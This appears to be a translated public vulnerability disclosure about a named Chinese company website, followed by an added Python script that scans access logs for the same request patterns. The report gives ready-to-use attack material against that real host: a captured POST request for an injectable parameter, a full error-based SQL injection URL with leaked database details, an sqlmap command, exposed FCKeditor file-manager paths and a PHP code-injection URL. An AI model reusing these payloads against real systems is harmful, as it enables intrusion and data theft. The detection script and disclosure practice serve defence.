2015-02-16: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2015-04-02: The vendor has actively ignored the vulnerability; details are disclosed to the public.
Multiple SQL injection points and sensitive directories exist.
HTTP headers of the request submitted to the POST injection point:
POST /down_soft.php? HTTP/1.1
Host: www.bbktel.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.bbktel.com.cn/down_soft.php?
Cookie: PHPSESSID=h1dpu9m881rabcr7juq64kfcm7; Isz_sid=NGN2g2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

Classid=4&pro_number=&image.x=42&image.y=4
The forum has an injection vulnerability as well; floor() error-based statement:
Database version number, username and database name:
http://www.bbktel.com.cn/bbs/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),user(),database(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
SQL: SELECT * FROM [Table]usergroups u LEFT JOIN [Table]admingroups a ON u.groupid=a.admingid WHERE u.groupid IN ('10','11','12','\',') and (select 1 from (select count(*),concat(version(),user(),database(),floor(rand(0)*2))x from information_schema.tables group by x)a)#')
Error: Duplicate entry '5.5.23-logbbktel_bbs@localhostbbk_tel1' for key 'group_key'
Sensitive directories exist:
http://www.bbktel.com.cn/fckeditor/editor/filemanager/connectors/test.html
http://www.bbktel.com.cn/fckeditor/editor/filemanager/browser/default/browser.html?Connector=http%3A%2F%2Fwww.bbktel.com.cn%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php
sqlmap.py -r bbg.txt -p Classid --dbs
Database: bbk_tel [145 tables]
Administrator account passwords:
User information:
Sensitive information exposure:
www.bbktel.com.cn/bbs/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}}
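From the defender's side, the three request patterns shown in this report (the floor(rand(0)*2) ... group by error-based injection, the `{${...}}` expression injected into the forum's scriptlang parameter, and probes of the FCKeditor file-manager paths) are straightforward to flag in web-server access logs. The following Python is an added example, not part of the original report; the log lines, client IPs and rule names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the report). The request
# paths mirror the three finding types above; the last two lines are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Apr/2015:10:00:01 +0800] "GET /bbs/faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 HTTP/1.1" 200 512
10.0.0.5 - - [02/Apr/2015:10:00:02 +0800] "GET /bbs/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}} HTTP/1.1" 200 40960
10.0.0.6 - - [02/Apr/2015:10:00:03 +0800] "GET /fckeditor/editor/filemanager/connectors/test.html HTTP/1.1" 200 2048
10.0.0.7 - - [02/Apr/2015:10:00:04 +0800] "GET /bbs/faq.php?action=grouppermission&gids[1]=10 HTTP/1.1" 200 3000
10.0.0.8 - - [02/Apr/2015:10:00:05 +0800] "POST /down_soft.php HTTP/1.1" 200 1200
"""

# Pulls method and request path out of a combined-format log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

# Detection rules: (rule name, predicate over the URL-decoded request path).
RULES = [
    ("error_based_sqli_floor_rand",
     lambda p: bool(re.search(r"floor\s*\(\s*rand\s*\(", p, re.I))
     and bool(re.search(r"\bgroup\s+by\b", p, re.I))),
    ("information_schema_read", lambda p: "information_schema." in p.lower()),
    # A PHP variable-variable expression with a call inside, e.g. {${func()}}.
    ("php_template_injection", lambda p: re.search(r"\{\$\{[^}]*\(", p) is not None),
    ("fckeditor_connector_probe",
     lambda p: "/fckeditor/editor/filemanager/" in p.lower()),
]

def decode_path(path: str) -> str:
    """Percent-decode twice so double-encoded payloads do not slip past the rules."""
    return unquote_plus(unquote_plus(path))

def classify(line: str) -> list[str]:
    """Return the names of every rule that the request in this log line triggers."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    path = decode_path(m.group("path"))
    return [name for name, pred in RULES if pred(path)]

def scan(log_text: str) -> list[tuple[str, list[str]]]:
    """Return (client_ip, triggered_rules) for each log line that matches a rule."""
    hits = []
    for line in log_text.splitlines():
        names = classify(line)
        if names:
            hits.append((line.split()[0], names))
    return hits

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG):
        print(ip, ", ".join(names))
```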
There are too many vulnerabilities; patch them one at a time.
Unable to contact the vendor, or the vendor actively declined.